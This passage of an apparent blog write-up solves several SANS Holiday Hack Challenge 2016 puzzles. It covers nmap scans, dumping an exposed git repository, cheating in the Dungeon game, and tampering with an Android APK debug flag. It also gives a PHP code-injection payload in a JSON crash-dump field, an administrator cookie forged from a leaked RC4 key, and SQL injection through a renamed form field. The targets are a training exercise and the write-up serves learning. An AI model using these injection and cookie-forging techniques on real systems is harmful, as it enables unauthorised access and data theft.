|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: Finishing touches (style, css, etc)
| http-title: Sprusage Usage Reporter!
|_Requested resource was login.php
| ssl-cert: Subject: commonName=analytics.northpolewonderland.com
| Not valid before: 2016-12-07T17:35:00
|_Not valid after:  2017-03-07T17:35:00
|_ssl-date: TLS randomness does not represent time
| tls-nextprotoneg:
|_  http/1.1

Nmap done: 1 IP address (1 host up) scanned in 27.67 seconds

“git” (on port 443 “http-git”) is used to manage source code – note the “Last commit message” line, showing us developer comments. We’re able to download all of the “git” files, and re-create the code base for this application, by following this blog post: https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/.

Once we’ve done that we can look through the code for useful information – such as the username “guest” appearing often. We can also see this username and password “busyreindeer78” from earlier in the network traffic if we captured it, otherwise we can guess it’s the same guest account… which we can use to log in to http://analytics.northpolewonderland.com. There’s a “MP3” link visible when logged in, which gives us an audio file: “discombobulatedaudio2.mp3“. Quite easily done!


 

The Dungeon Game

Address: dungeon.northpolewonderland.com

Running an “nmap” scan with the “-sC” options on this target gives us this:

temp: nmap -sC dungeon.northpolewonderland.com

Starting Nmap 7.01 ( https://nmap.org ) at 2016-12-15 20:10 SAST
Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139)
Host is up (0.27s latency).
rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com
Not shown: 997 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey:
|   1024 4e:cd:15:a7:44:ed:87:d5:41:81:c2:0e:78:db:c0:d0 (DSA)
|   2048 5b:14:72:d1:17:a2:3f:98:fb:fe:6c:7d:29:49:19:a2 (RSA)
|_  256 6a:8d:56:49:a3:f5:8c:fd:14:42:a7:c0:4e:ef:a8:64 (ECDSA)
80/tcp    open  http
|_http-title: About Dungeon
11111/tcp open  vce

Nmap done: 1 IP address (1 host up) scanned in 20.64 seconds

The web server tells about the game “Dungone” (aka Zork), and if you telnet in to port “11111” you can play the game. We can also find out about it, and download a .zip of it to run locally, by talking to “Pepper” in the workshop (up the long ladder) :

<Pepper Minstix> – When I need a break from bug bounty work, I play Dungeon. I’ve been playing it since 1978. I still have yet to beat the Cyclops…
<Pepper Minstix> – Alabaster’s brother is the only elf I’ve ever seen beat it, and he really immersed himself in the game. I have an old version here.

I spent the most time on this challenge, not really sure what I was meant to do. I managed to complete the game, by cheating of course, but that didn’t give any info that seemed to be related to this challenge. On the topic of cheating, Pepper mentions it (above), and here’s how I found out how to cheat. It started with me wondering why saving and restoring was disabled:

dungeon: ltrace ./dungeon
__libc_start_main(0x4060a3, 1, 0x7ffee313cab8, 0x419570 
getenv("TERM")                                                                                                                                                          = "xterm"
tgetent(0x7ffee313c130, 0x7ffee313e401, 0x7ffee313e401, 14)                                                                                                             = 1
tgetnum(0x41e088, 42, 0, 0x1f2e9d0)                                                                                                                                     = 63
getuid()                                                                                                                                                                = 1000
getuid()                                                                                                                                                                = 1000
fopen("dtextc.dat", "r")                                                                                                                                                = 0x1f2d2d0
_IO_getc(0x1f2d2d0)                                                                                                                                                     = '\0'
...snip...
putchar(46, 209, 114, 0xfbad2a84)                                                                                                                                       = 46
_IO_getc(0x211c2d0)                                                                                                                                                     = '\304'
putchar(10, 196, 74, 0xfbad2a84There is a small wrapped mailbox here.
)                                                                                                                                        = 10
putchar(62, 1, 0xe420, 1)                                                                                                                                               = 62
fflush(0x7f73dfdeb620>)                                                                                                                                                  = 0
fgets(

save

"save\n", 78, 0x7f73dfdea8e0)                                                                                                                                     = 0x625a84
__ctype_b_loc()                                                                                                                                                         = 0x7f73e02246b0
toupper('s')                                                                                                                                                            = 'S'
__ctype_b_loc()                                                                                                                                                         = 0x7f73e02246b0
toupper('a')                                                                                                                                                            = 'A'
__ctype_b_loc()                                                                                                                                                         = 0x7f73e02246b0
toupper('v')                                                                                                                                                            = 'V'
__ctype_b_loc()                                                                                                                                                         = 0x7f73e02246b0
toupper('e')                                                                                                                                                            = 'E'
strcmp("SAVE", "GDT")                                                                                                                                                   = 12

Note that “GDT” being compared to “SAVE” – interesting. You could also find out about this by downloading the source code of Dungeon 2.7A from http://ifarchive.flavorplex.com/indexes/if-archiveXgamesXsource.html and reading the documentation which mentions it (along with “!” as a shell escape – which didn’t work). This command brings up the “game debugging package” with many options – such as changing the room you’re currently in (“AH”) or taking items (“TK”).

>GDT

GDT>help
Valid commands are:
AA- Alter ADVS          DR- Display ROOMS
AC- Alter CEVENT        DS- Display state
AF- Alter FINDEX        DT- Display text
AH- Alter HERE          DV- Display VILLS
AN- Alter switches      DX- Display EXITS
AO- Alter OBJCTS        DZ- Display PUZZLE
AR- Alter ROOMS         D2- Display ROOM2
AV- Alter VILLS         EX- Exit
AX- Alter EXITS         HE- Type this message
AZ- Alter PUZZLE        NC- No cyclops
DA- Display ADVS        ND- No deaths
DC- Display CEVENT      NR- No robber
DF- Display FINDEX      NT- No troll
DH- Display HACKS       PD- Program detail
DL- Display lengths     RC- Restore cyclops
DM- Display RTEXT       RD- Restore deaths
DN- Display switches    RR- Restore robber
DO- Display OBJCTS      RT- Restore troll
DP- Display parser      TK- Take

GDT>AH
Old=      2      New= 3

GDT>TK
Entry:    1
Taken.

Now on to solving the challenge, if you open the mailbox and read the leaflet in the beginning it tells you what you need to do:

Welcome to Dungeon.			This version created 11-MAR-78.
You are in an open field west of a big white house with a boarded
front door.
There is a small wrapped mailbox here.
>open mailbox

Opening the mailbox reveals:
  A leaflet.

>read leaflet
Taken.
		    Welcome to Holiay Hack Challenge Dungeon!

   ...snip...

   Your mission is to find the elf at the North Pole and barter with him
for information about holiday artifacts you need to complete your quest.

   While the original mission objective of collecting twenty treassures to
place in the trophy case is still in play, it is not necessary to finish
your quest.

I wasn’t going to try and find the “North Pole” manually (try playing the game and see how long it takes), so I started using the “GDT” menu to move me to different rooms (“AH” command), but this was quite time consuming. I wrote a script to telnet in to the hosted server, bring up the “GDT” menu, go to the next room, do a “look”, and repeat – giving me an output of what is in every room – and I came across this:

Room 191:
You are at the North Pole. There is a blizzard blowing making it hard to
hear or see. In the distance you detect the busy sounds of Santa's elves
in full production. To the north you discern the outline of a door with a
warm glow omitting from under the door.


Room 192:
You have mysteriously reached the North Pole.
In the distance you detect the busy sounds of Santa's elves in full
production.

You are in a warm room, lit by both the fireplace but also the glow of
centuries old trophies.
On the wall is a sign:
		Songs of the seasons are in many parts
		To solve a puzzle is in our hearts
		Ask not what what the answer be,
		Without a trinket to satisfy me.
The elf is facing you keeping his back warmed by the fire.

Now to find the right item to give to the elf, I used a similar script to loop through numbers giving me that item (with the “GDT” + “TK” commands) and then type “inventory” to see what I had. I spotted some items I thought might not be part of the original game, that the elf might be interested in:

Item 138: A piece of "EAT ME" cake.
Item 139: A piece of cake with orange icing.
Item 140: A piece of cake with red icing.
Item 141: A piece of cake with blue icing.
Item 142: A robot.
Item 143: A green piece of paper.
Item 144: A large tree.
Item 145: A large tree.
Item 146: A cliff.
Item 147: A white cliff.
Item 148: A stack of zorkmid bills.
Item 149: A portrait of J. Pierpont Flathead.
Item 150: A large stone cube.
Item 151: A shimmering curtain of light.
Item 152: A gnome of Zurich.

Now to finish the game:

You have mysteriously reached the North Pole.
In the distance you detect the busy sounds of Santa's elves in full
production.

You are in a warm room, lit by both the fireplace but also the glow of
centuries old trophies.
On the wall is a sign:
		Songs of the seasons are in many parts
		To solve a puzzle is in our hearts
		Ask not what what the answer be,
		Without a trinket to satisfy me.
The elf is facing you keeping his back warmed by the fire.

>give portrait

The elf, satisified with the trade says -
send email to "peppermint@northpolewonderland.com" for that which you seek.
The elf says - you have conquered this challenge - the game will now end.
Your score is 10 [total of 585 points], in 20 moves.
This gives you the rank of Beginner.
The game is over.

If you do this with the dungeon.zip you’re given in the game, rather than on the server, you’re told “Try the online version for the true prize” instead of giving you the email address. Sending an e-mail to that address gives you:

You tracked me down, of that I have no doubt.

I won't get upset, to avoid the inevitable bout.

You have what you came for, attached to this note.

Now go and catch your villian, and we will alike do dote.

With an attachment of “discombobulatedaudio3.mp3


 

The Debug Server

Address: dev.northpolewonderland.com

Running an nmap scan on this address didn’t reveal anything too useful, and attempts to make GET or POST requests to the webserver didn’t respond with anything. While searching the JadX decompiled APK code for “debug” will get you to “EditProfile.java” with strings about “Remote debug logging is Enabled/Disabled”, and the keys for a JSON payload to be sent to the server – but it’s not enough to start making requests to the server… without a valid “debug” value you wont get any response.

Instead you need the Apktool extracted files, and to modify the “debug_data_enabled” value in “res\values\strings.xml” to “true”, and then re-compile the APK like this:

temp: ls -l
-rwxrwxrwx 1 hypn hypn 6972627 Dec 15 20:35 apktool.jar
drwxrwxrwx 1 hypn hypn    4096 Dec 15 20:36 SantaGram_4.2
-rwxrwxrwx 1 hypn hypn 2257390 Dec 15 20:35 SantaGram_4.2.apk

temp: java -jar apktool.jar b SantaGram_4.2
I: Using Apktool 2.2.1
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether resources has changed...
I: Building resources...
I: Building apk file...
I: Copying unknown files/dir...

temp: ls -l
-rwxrwxrwx 1 hypn hypn 6972627 Dec 15 20:35 apktool.jar
drwxrwxrwx 1 hypn hypn    4096 Dec 15 20:42 SantaGram_4.2
-rwxrwxrwx 1 hypn hypn 2257390 Dec 15 20:35 SantaGram_4.2.apk

temp: ls -l SantaGram_4.2
-rwxrwxrwx 1 hypn hypn  2569 Dec 15 20:36 AndroidManifest.xml
-rwxrwxrwx 1 hypn hypn   398 Dec 15 20:36 apktool.yml
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:36 assets
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:41 build
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:42 dist
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:36 original
drwxrwxrwx 1 hypn hypn 40960 Dec 15 20:36 res
drwxrwxrwx 1 hypn hypn     0 Dec 15 20:36 smali

temp: ls -l SantaGram_4.2/dist
-rwxrwxrwx 1 hypn hypn 2245428 Dec 15 20:42 SantaGram_4.2.apk

Now install the apk in “SantaGram_4.2/dist” on to an Android device (or try Genymotion) and intercept the traffic. As mentioned above, it’s the “EditProfile” file that contains the “debug” logic – so sign up, edit your profile, and capture a valid POST to the server:

{
    "date": "20161214173924+0200",
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "freemem": 59034848,
    "udid": "a0ae7d008722d82"
}

Which returns:

{
    "date": "20161214153954",
    "filename": "debug-20161214153954-0.txt",
    "request": {
        "date": "20161214173924+0200",
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "freemem": 59034848,
        "udid": "a0ae7d008722d82",
        "verbose": false
    },
    "status": "OK"
}

We are told about manipulating JSON values by “Alabaster Snowball” (in “Elf House #2 – Room 2”), and about PHP filters and local file inclusion by “Sugarplum Mary” (in “Elf House #1”) :

<Alabaster Snowball> – My favorite hacking technique? It has to be JSON parameter editing.
<Alabaster Snowball> – After capturing RESTful web traffic in Burp Suite, I right-click and select “Copy as Curl Command”.
<Alabaster Snowball> – Then, just paste it into a script, and start tweaking parameters.
<Alabaster Snowball> – You can use Burp Repeater too, but I am trying to live up to Santa’s command line Kung-fu!
<Alabaster Snowball> – Always compare the request and the response data. Any time I see an interesting variation, I start changing the parameters around. Super fun!

<Sugarplum Mary> – PHP Filters can be used to read all kinds of I/O Streams.
<Sugarplum Mary> – As a developer, I must be careful to ensure attackers can’t use them to access sensitive files or data.
<Sugarplum Mary> – Jeff McJunkin wrote a blog post on local file inclusions using this technique.
<Sugarplum Mary> – I need to go back and make sure no one can read my source code using this technique.

By changing the “verbose” value to “true” in our POST payload, we get an interesting (and different) response back:

{
    "date": false,
    "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
    "freemem": false,
    "udid": false,
    "verbose": true
}
{
    "date": "20161214161754",
    "date.len": 14,
    "status": "OK",
    "status.len": "2",
    "filename": "debug-20161214161754-0.txt",
    "filename.len": 26,
    "request": {
        "date": false,
        "debug": "com.northpolewonderland.santagram.EditProfile, EditProfile",
        "freemem": false,
        "udid": false,
        "verbose": true
    },
    "files": [
        "debug-20161214161754-0.txt",
        "debug-20161224235959-0.mp3",
        "index.php"
    ]
}

Note list of files and the MP3 file: “debug-20161224235959-0.mp3” – another audio file (http://dev.northpolewonderland.com/debug-20161224235959-0.mp3)


 

The Banner Ad Server

Address: ads.northpolewonderland.com

An nmap scan of this host doesn’t reveal anything interesting. Talking to “Pepper Minstix” (in the workshop), we’re told about “Meteor Miner” which is worth installing:

<Pepper Minstix> – Hi, my name is Pepper Minstix. I’m one of Santa’s bug bounty elves.
<Pepper Minstix> – Lately, I’ve been spending time attacking JavaScript frameworks, specifically the Meteor Framework.
<Pepper Minstix> – Meteor uses a publish/subscribe messaging platform. This makes it easy for a web page to get dynamic data from a server.
<Pepper Minstix> – Meteor’s message passing mechanism uses the Distributed Data Protocol (DDP). DDP is basically a JSON-based protocol using WebSockets and SockJS for RPC and data management.
<Pepper Minstix> – The good news is that Meteor mitigates most XSS attacks, CSRF attacks, and SQL injection attacks.
<Pepper Minstix> – The bad news is that people get a little too caught up in messaging subscriptions, and get too much data from the server.
<Pepper Minstix> – You should check out Tim Medin’s talk from HackFest 2016 and the related blog post.
<Pepper Minstix> – Also, Meteor Miner is a browser add-on for Tampermonkey to easily browse through Meteor subscriptions. Check it out!

You’ll need to disable your adblockers to use the site. Meteor Miner should pop up and show you information about the site – with the “admin/quotes” route catching my attention. Watching Chrome’s “Network” tab, specifically the WebSockets (“WS” filter), when navigating to that URL shows some interesting information and gives us another audio file:

Be sure to copy the full path: “discombobulatedaudio5.mp3


 

The Uncaught Exception Handler Server

Address: ex.northpolewonderland.com

I was able to get my android device to throw an exception, and watch this request go by, but the site also guides you through making a valid request. A GET request to http://ex.northpolewonderland.com/exception.php gets a reply telling you to do a POST, which then tells you it must be JSON, contain an “operation” of either “WriteCrashDump” or “ReadCrashDump”. Sending through some dummy data yields and interesting response, and a “.php” filename:

{
    "data": {
      "foo": "bar"
    },
    "operation": "WriteCrashDump"
}

{
	"success" : true,
	"folder" : "docs",
	"crashdump" : "crashdump-ZeF3Sb.php"
}

Accessing the .php file (note the “docs” folder to include in the url) just returns us the data we sent it – a bit strange that it would be a PHP file. Using some information from “Sugar Plummary” (in “Elf House #1”), we can see the source code of the file:

<Sugarplum Mary> – I like PHP, it offers so much flexibility even though the syntax is straight out of 1978.
<Sugarplum Mary> – PHP Filters can be used to read all kinds of I/O Streams.
<Sugarplum Mary> – As a developer, I must be careful to ensure attackers can’t use them to access sensitive files or data.
<Sugarplum Mary> – Jeff McJunkin wrote a blog post on local file inclusions using this technique.
<Sugarplum Mary> – I need to go back and make sure no one can read my source code using this technique.

This time doing a “ReadCrashDump” (and specifying the “crashdump” property without the “.php” extension as we’re told when trying to make requests) we can see the (base64’ed) contents of the file which we can easily decode:

PD9waHAgcHJpbnQoJ3sKICAgICJmb28iOiAiYmFyIgp9Jyk7

<?php print('{
    "foo": "bar"
}');

Because our data is being inserted in to a text string (and wrapped with single quotes), we can inject our own PHP code much like SQL injection works – add a single quote, close bracket and semi colon to break out of the “print”, add our own code, then do another “print” to deal with the rest of our JSON payload:

{
    "data": {
      "test": "'); print_r(scandir('..')); print('"
    },
    "operation": "WriteCrashDump"
}

After some trial and error we get the payload above which lists all files in the parent directory when accessed directly:

{
    "test": "Array
	(
	    [0] => .
	    [1] => ..
	    [2] => discombobulated-audio-6-XyzE3N9YqKNH.mp3
	    [3] => docs
	    [4] => docs.tar.gz
	    [5] => exception.php
	)
}

And there’s this challenge’s audio file: discombobulated-audio-6-XyzE3N9YqKNH.mp3 (NOT in the “docs” folder).


 

The Mobile Analytics Server (post authentication)

Address: analytics.northpolewonderland.com

We already got all of the source code to this site previously, and if we look in the “login.php” and “crypto.php” files we can see how cookies are generated – and that they just store the logged in user’s username (and expiry date) :

$auth = encrypt(json_encode([
  'username' => $_POST['username'],
  'date' => date(DateTime::ISO8601),
]));

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

function encrypt($data) {
	return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

function decrypt($data) {
	return mcrypt_decrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

With this information it’s trivial for us to create a cookie for the “administrator” user (also referred to in the code, so we know this account exists – and that we want some of his functionality), by re-using their key and encryption code :

<?php
define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

function encrypt($data) {
	return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
}

echo bin2hex(encrypt('{"username":"administrator","date":"2017-12-14T10:31:10+0000"}'))."\n";

Now all you need to do is insert the cookie in to your browser (I used Chrome and the “Web developer” extension to view and edit cookies) and then reload the site. Rather than the “MP3” link in the menu, we now have an “Edit” option which we’ll get to shortly:

Start by choosing to “Query Data”, entering some values, and choosing to save the query:

This tells us the report saved, and gives us it’s unique id:

Now click the “Edit” link, enter the ID and hit save:

We can see that a SQL update was performed, and fields matching our inputs were changed:

If we look at the “sprusage.sql” file in the code base, we can see that these fields are consisted with the “reports” database table, except that there’s also a “query” property:

CREATE TABLE `reports` (
	`id` varchar(36) NOT NULL,
	`name` varchar(64) NOT NULL,
	`description` text,
	`query` text NOT NULL,
	PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;

Using Chrome’s “inspect” (html element) we can change the label and name of one of the inputs on the “Edit” page to be “query”, and then insert our own SQL (you might also notice these are GET parameters, so you can just change their names+values in the address bar after submitting the page) :

And we can see that it did actually update the database:

And then using the “View” page, we can view our report and see our SQL code be exectued:

Looking in the “sprusage.sql” file we can see there’s also an “audio” table. We can edit our report’s query to fetch the data from there but the “mp3” value wont be shown because it’s a BLOB, so we’ll need to return it in hex or base 64. The query I used was:

SELECT username, filename, HEX(mp3) from audio

The (long) hex value just needs to be copied out and converted back to a usable file, giving us “discombobulatedaudio7.mp3“.


 

8) What are the names of the audio files you discovered from each system above?

  • discombobulatedaudio1.mp3
  • discombobulatedaudio2.mp3
  • discombobulatedaudio3.mp3
  • debug-20161224235959-0.mp3
  • discombobulatedaudio5.mp3
  • discombobulated-audio-6-XyzE3N9YqKNH.mp3
  • discombobulatedaudio7.mp3

 


Part 5: Discombobulated Audio

And, finally, Dear Reader, now is your chance to bring the foul villain who nabbed Santa to justice. Analyze the audio files and find the villain in the North Pole to answer these questions:
9) Who is the villain behind the nefarious plot.
10) Why had the villain abducted Santa?

As the story goes the “Audio Discombobulator” has recorded, but scrambled, some spoken word we need to hear. I solved this part using Audacity, copying and pasting the audio files together (in order) and then modifying the audio until I could make out what was being said. I used “Effects -> Change Tempo -> 400%” and then “Effects -> Change Speed -> 30%”, and could hear:

Father Christmas, Santa Claus, or – as I’ve always known him – Jeff

Which is a quote from Doctor Who! Specifically the “A Christmas Carol” episode. This (without any punctuation: “father christmas santa claus or as I’ve always known him jeff”) is also the passphrase for the door in “The Corridor” (through the bookcase in “Santa’s Office”) which takes us to “The Clock Tower:”

<Dr. Who> – The question of the hour is this: Who nabbed Santa.
<Dr. Who> – The answer? Yes, I did.
<Dr. Who> – Next question: Why would anyone in his right mind kidnap Santa Claus?
<Dr. Who> – The answer: Do I look like I’m in my right mind? I’m a madman with a box.
<Dr. Who> – I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It’s a better life, I tell you, a better world than the scarred one we endure here.
<Dr. Who> – Give me a world like that. Just once.
<Dr. Who> – So I did what I had to do. I knew that Santa’s powerful North Pole Wonderland Magick could prevent the Star Wars Special from being released, if I could leverage that magick with my own abilities back in 1978. But Jeff refused to come with me, insisting on the mad idea that it is better to maintain the integrity of the universe’s timeline. So I had no choice – I had to kidnap him.
<Dr. Who> – It was sort of one of those days.
<Dr. Who> – Well. You know what I mean.
<Dr. Who> – Anyway… Since you interfered with my plan, we’ll have to live with the Star Wars Holiday Special in this universe… FOREVER. If we attempt to go back again, to cross our own timeline, we’ll cause a temporal paradox, a wound in time.
<Dr. Who> – We’ll never be rid of it now. The Star Wars Holiday Special will plague this world until time itself ends… All because you foiled my brilliant plan. Nice work.


NetWars Coins:

I’m not going to list where to find every coin because there are just too many, and many are hidden in “unfair” places (eg: beind the NetWars blackboard in 1978, and beind a roof) – you basically need to over your mouse over every part of every screen to find them all… or you can cheat (thanks @warquel) by running this Javascript in your browser’s console:

$('canvas#floating').attr('hidden', true);

Which will hide some shading/shadows, clouds, and graphics on top of other things… like NetWars coins. Run it again changing “true” to “false” to reset the game to the normal state, but this helps a LOT!

Leave a Reply

Your email address will not be published. Required fields are marked *